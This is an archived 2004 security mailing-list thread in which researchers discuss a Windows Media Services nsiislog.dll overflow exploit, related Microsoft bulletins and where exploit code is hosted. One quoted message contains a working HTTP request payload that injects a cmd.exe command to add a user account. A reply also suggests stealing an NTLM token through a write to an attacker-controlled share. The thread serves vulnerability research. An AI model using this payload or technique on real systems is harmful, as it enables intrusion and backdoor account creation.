Dailydave mailing list archives
RE: New mediaservices sploit
From: "Brett Moore" <brett () softwarecreations co nz>
Date: Sun, 14 Mar 2004 21:52:55 +1300
Its late so I may be confused.. since its sunday, I most likely am. Chunked Encoded Heap Overflow http://www.microsoft.com/technet/security/Bulletin/MS03-019.mspx Large Post Stack Overflow http://www.microsoft.com/technet/security/Bulletin/MS03-022.mspx And the revised bulletin last week was to fix an issue where if media services was uninstalled and then the patch was applied, and then media services was reinstalled, it would install the old vulnerable dll. http://downloads.securityfocus.com/vulnerabilities/exploits/firew0rker.c looks like an exploit for the stack based overflow... I haven't tested it but the vulnerable .dll (well it shld be) is installed if somebody wants to.. Brett -----Original Message----- From: dailydave-bounces () lists immunitysec com [mailto:dailydave-bounces () lists immunitysec com]On Behalf Of Dave Aitel Sent: Sunday, March 14, 2004 8:23 AM To: dailydave () lists immunitysec com Subject: Re: [Dailydave] New mediaservices sploit -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 H D Moore wrote: | The code was posted to a few sites, it doesn't crash nor exploit | any version of nsiislog.dll that I could find. Tested multiple | variations on a stock Windows 2000 SP0 system without any real | result. I am assuming that since its in CANVAS, it actually works | on /something/, are there any special circumstances required to | trigger it? Does the MS03-019 patch have to be installed for it be | vulnerable to this MX_Stats overflow? It almost sounds like it is | just another variation of the POST bug... is it also fixed by | MS03-022? Well, the POST bug was a heap overflow, and this bug is a stack overflow, so I dunno. It works on my version of nsiislog.dll, which is fairly old. It's been a while since I wrote it, so I don't remember exactly what happened with the patch situation. | | Brett actually found three bugs in this ISAPI; the original chunked | encoding one, then the POST content overflow, and finally the one | which was released by M$ last week. Does anyone have details on the | latest vuln? Last week? I think I must have missed it. | | Bonus points to anyone who can find a better way to exploit the | unnamed bug^H^H^Hfeature below, without being dependent on an | alternate web service or third-party software. The goal is instant | command execution through writing a file to the system with | arbitrary (even binary) contents. Writing to autoexec, startup, etc | doesn't work since it requires user interaction. Assuming Windows | 2000 or newer. Writing ".job" files to \winnt\tasks doesn't work | now that signatures are embedded (thanks Brett for info). | | GET | /plugins/framework/script/tree.xms?obj=httpd:WriteToFile([$__installdir$]con f/portlisten.conf,Listen% | | 208000%0A%0DAccessLog%20"|../../../../../../winnt/system32/cmd.exe%20/c% | 20net%20user%20P%20P%20/ADD"%0A%0D HTTP/1.0 | | -HD You can't write a .asp file into the scripts directory? Or a .dll? I assume not. You're running as SYSTEM? Why not write to \\myserver\\ and steal the token and relogin through NTLM auth? - -dave | | On Saturday 13 March 2004 10:55, Dave Aitel wrote: | |> Securityfocus's vulnerability database isn't really that good for |> accuracy. I checked out their update on this media services bug, |> and noticed that one of the sploits is for something that was |> never publicly released. This is a new bug, not the old bug that |> Brett Moore found. |> |> http://downloads.securityfocus.com/vulnerabilities/exploits/firew0rker. |> c |> |> (It's in CANVAS as well, btw) |> |> -dave |> |> _______________________________________________ Dailydave mailing |> list Dailydave () lists immunitysec com |> http://www.immunitysec.com/mailman/listinfo/dailydave | | _______________________________________________ Dailydave mailing | list Dailydave () lists immunitysec com | http://www.immunitysec.com/mailman/listinfo/dailydave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFAU1+NzOrqAtg8JS8RAgv+AJwKe9u1cuTDggWG0jGGMAPHE3N7lgCfVeUR q3eaEdpJZeuG97kHz07TkOU= =E4yX -----END PGP SIGNATURE----- _______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://www.immunitysec.com/mailman/listinfo/dailydave
Attachment:
midNSIISLOG.DLL
Description:
_______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://www.immunitysec.com/mailman/listinfo/dailydave
Current thread:
- New mediaservices sploit Dave Aitel (Mar 13)
- Re: New mediaservices sploit H D Moore (Mar 13)
- Re: New mediaservices sploit Dave Aitel (Mar 13)
- Re: New mediaservices sploit wirepair (Mar 13)
- Re: New mediaservices sploit H D Moore (Mar 13)
- RE: New mediaservices sploit Brett Moore (Mar 14)
- RE: New mediaservices sploit Dave Aitel (Mar 14)
- Re: New mediaservices sploit Dave Aitel (Mar 13)
- Re: New mediaservices sploit H D Moore (Mar 13)
- Re: New mediaservices sploit wirepair (Mar 13)
- execution by WriteToFile? (was Re: New mediaservices sploit) Max Vision (Mar 14)